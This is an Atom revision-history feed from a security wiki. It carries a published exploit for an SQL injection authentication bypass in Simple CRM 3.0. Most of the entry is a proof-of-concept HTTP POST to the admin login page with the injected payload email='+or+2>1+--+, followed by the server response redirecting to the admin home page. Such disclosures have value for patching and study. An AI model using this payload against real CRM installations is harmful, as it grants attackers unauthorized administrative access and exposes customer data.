<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Simple_CRM_3.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E</id>
	<title>Simple CRM 3.0 SQL注入漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Simple_CRM_3.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Simple_CRM_3.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-14T23:16:18Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Simple_CRM_3.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=5574&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;&lt;pre&gt; # Exploit Title: Simple CRM 3.0 - 'email' SQL injection (Authentication Bypass)  # Date: 22/06/2021 # Exploit Author: Rinku Kumar (rinku191) # Vendor Homepage: https://p...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Simple_CRM_3.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=5574&amp;oldid=prev"/>
		<updated>2021-06-24T01:11:43Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;&amp;lt;pre&amp;gt; # Exploit Title: Simple CRM 3.0 - &amp;#039;email&amp;#039; SQL injection (Authentication Bypass)  # Date: 22/06/2021 # Exploit Author: Rinku Kumar (rinku191) # Vendor Homepage: https://p...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Simple CRM 3.0 - 'email' SQL injection (Authentication Bypass) &lt;br /&gt;
# Date: 22/06/2021&lt;br /&gt;
# Exploit Author: Rinku Kumar (rinku191)&lt;br /&gt;
# Vendor Homepage: https://phpgurukul.com/&lt;br /&gt;
# Software Link:   https://phpgurukul.com/small-crm-php/&lt;br /&gt;
# Version: 3.0&lt;br /&gt;
# Category: Webapps&lt;br /&gt;
# Tested on: Apache2+MariaDB latest version&lt;br /&gt;
# Description : Simple CRM suffers from SQL injection vulnerability, allowing an un-authenticated attackers to login into CRM admin panel.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vulnerable Page: /crm/admin/&lt;br /&gt;
&lt;br /&gt;
POC-Request&lt;br /&gt;
-----------------------------------&lt;br /&gt;
POST /scrm/crm/admin/ HTTP/1.1&lt;br /&gt;
Host: 127.0.0.1&lt;br /&gt;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0&lt;br /&gt;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8&lt;br /&gt;
Accept-Language: en-US,en;q=0.5&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
Content-Type: application/x-www-form-urlencoded&lt;br /&gt;
Content-Length: 35&lt;br /&gt;
Origin: http://127.0.0.1&lt;br /&gt;
Connection: close&lt;br /&gt;
Referer: http://127.0.0.1/scrm/crm/admin/&lt;br /&gt;
Cookie: PHPSESSID=oj0mohnmrt809ndld8pg1p9f14&lt;br /&gt;
Upgrade-Insecure-Requests: 1&lt;br /&gt;
&lt;br /&gt;
email='+or+2&amp;gt;1+--+&amp;amp;password=&amp;amp;login=&lt;br /&gt;
&lt;br /&gt;
---------------------------------------&lt;br /&gt;
POC-Response&lt;br /&gt;
&lt;br /&gt;
HTTP/1.1 200 OK&lt;br /&gt;
Date: Tue, 22 Jun 2021 15:53:00 GMT&lt;br /&gt;
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33&lt;br /&gt;
X-Powered-By: PHP/7.2.33&lt;br /&gt;
Expires: Thu, 19 Nov 1981 08:52:00 GMT&lt;br /&gt;
Cache-Control: no-store, no-cache, must-revalidate&lt;br /&gt;
Pragma: no-cache&lt;br /&gt;
Content-Length: 48&lt;br /&gt;
Connection: close&lt;br /&gt;
Content-Type: text/html; charset=UTF-8&lt;br /&gt;
&lt;br /&gt;
&amp;lt;script&amp;gt;window.location.href='home.php'&amp;lt;/script&amp;gt;&lt;br /&gt;
            &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>